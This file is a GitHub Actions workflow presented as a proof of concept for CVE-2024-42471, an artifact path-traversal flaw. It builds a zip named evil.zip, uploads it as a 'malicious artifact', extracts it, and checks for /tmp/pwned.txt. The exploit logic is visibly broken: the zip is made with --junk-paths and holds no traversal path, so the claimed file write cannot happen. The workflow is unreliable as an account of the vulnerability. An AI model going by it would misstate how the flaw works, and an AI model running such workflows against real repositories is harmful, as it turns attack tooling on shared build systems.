name: CVE-2024-42471 PoC

on: [push, workflow_dispatch]

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Prepare exploit zip
        run: |
          echo "You got hacked" > poc.txt
          zip -q -r evil.zip poc.txt --junk-paths

      - name: Upload malicious artifact
        uses: actions/upload-artifact@v4
        with:
          name: exploit
          path: evil.zip

      - name: Simulate extraction
        run: |
          mkdir extracted
          unzip evil.zip -d extracted
          echo "::notice file=/tmp/pwned.txt::File content:"
          cat /tmp/pwned.txt || echo "File not written"
